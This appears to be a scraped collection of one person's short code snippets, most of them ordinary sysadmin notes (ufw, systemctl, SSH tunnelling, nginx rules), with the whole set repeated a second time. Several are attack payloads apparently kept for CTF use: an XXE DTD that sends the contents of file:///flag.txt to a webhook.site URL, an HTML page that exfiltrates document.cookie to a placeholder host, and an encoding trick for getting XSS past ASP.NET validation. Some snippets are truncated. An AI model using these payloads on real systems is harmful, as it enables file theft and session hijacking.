Étienne Ducharme b13bs

## firewall.sh
#!/bin/bash
# https://askubuntu.com/questions/530088/ufw-for-openvpn

# to allow ICMP: https://docs.j7k6.org/ufw-allow-icmp/

ufw --force reset

ufw default deny incoming # Use the VPN tunnel for all traffic
ufw default deny outgoing

## file.dtd
<!ENTITY % payl SYSTEM "file:///flag.txt">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'https://webhook.site/9e414fa3-7c41-482e-b6c8-b81e9f8d5bd0?p=%payl;'>">

## desktop-env.sh
# enable
sudo systemctl set-default graphical.target

# disable
sudo systemctl set-default multi-user.target

## SimpleHTTPServer6.py
import BaseHTTPServer
import SimpleHTTPServer
import socket


class HTTPServer6(BaseHTTPServer.HTTPServer):
    address_family = socket.AF_INET6


if __name__ == '__main__':

## cors.js
var script = document.createElement('script');script.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js";document.getElementsByTagName('head')[0].appendChild(script);

$.ajax({
	url: "https://fullurl-api.test",
	type: "OPTIONS",
	complete: function(result, status) {
		console.log(status)
		console.log(result)
	}
});

## socks.sh
user@machine1 $
ssh -L 8081:localhost:8081 user@machine2 ssh -ND 8081 user@machine3

## default
# allow from LAN, deny from WAN
allow 192.168.1.0/24;
deny   all;


# allow from LAN, basicauth from WAN
satisfy  any;
allow 192.168.1.0/24;
deny   all;
auth_basic            "closed site";

## index.html
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Page title</title>
</head>
<body>
  <script>
    document.location="http://url/?c=" + document.cookie;
  </script>

## aspnet-validate-xss-bypass.py
#!/usr/bin/env python3
# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/

# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E

import urllib.parse

input_string = "<img src=xxx onerror=alert(1)>"
replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}

## auto-default-speaker.sh
# https://askubuntu.com/questions/158241/automatically-change-sound-input-output-device

# Add this line in /etc/pulse/default.pa
load-module module-switch-on-connect
	#!/bin/bash
	# https://askubuntu.com/questions/530088/ufw-for-openvpn

	# to allow ICMP: https://docs.j7k6.org/ufw-allow-icmp/

	ufw --force reset

	ufw default deny incoming # Use the VPN tunnel for all traffic
	ufw default deny outgoing
	<!ENTITY % payl SYSTEM "file:///flag.txt">
	<!ENTITY % int "<!ENTITY % trick SYSTEM 'https://webhook.site/9e414fa3-7c41-482e-b6c8-b81e9f8d5bd0?p=%payl;'>">
	# enable
	sudo systemctl set-default graphical.target

	# disable
	sudo systemctl set-default multi-user.target
	import BaseHTTPServer
	import SimpleHTTPServer
	import socket


	class HTTPServer6(BaseHTTPServer.HTTPServer):
	address_family = socket.AF_INET6


	if __name__ == '__main__':
	var script = document.createElement('script');script.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js";document.getElementsByTagName('head')[0].appendChild(script);

	$.ajax({
	url: "https://fullurl-api.test",
	type: "OPTIONS",
	complete: function(result, status) {
	console.log(status)
	console.log(result)
	}
	});
	user@machine1 $
	ssh -L 8081:localhost:8081 user@machine2 ssh -ND 8081 user@machine3
	# allow from LAN, deny from WAN
	allow 192.168.1.0/24;
	deny all;


	# allow from LAN, basicauth from WAN
	satisfy any;
	allow 192.168.1.0/24;
	deny all;
	auth_basic "closed site";
	<!doctype html>
	<html>
	<head>
	<meta charset="utf-8">
	<title>Page title</title>
	</head>
	<body>
	<script>
	document.location="http://url/?c=" + document.cookie;
	</script>
	#!/usr/bin/env python3
	# source: http://gosecure.net/2016/03/22/xss-for-asp-net-developers/

	# Name=XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E

	import urllib.parse

	input_string = "<img src=xxx onerror=alert(1)>"
	replacements = {"%3C": "%EF%BC%9C", "%3E": "%EF%BC%9E"}
	# https://askubuntu.com/questions/158241/automatically-change-sound-input-output-device

	# Add this line in /etc/pulse/default.pa
	load-module module-switch-on-connect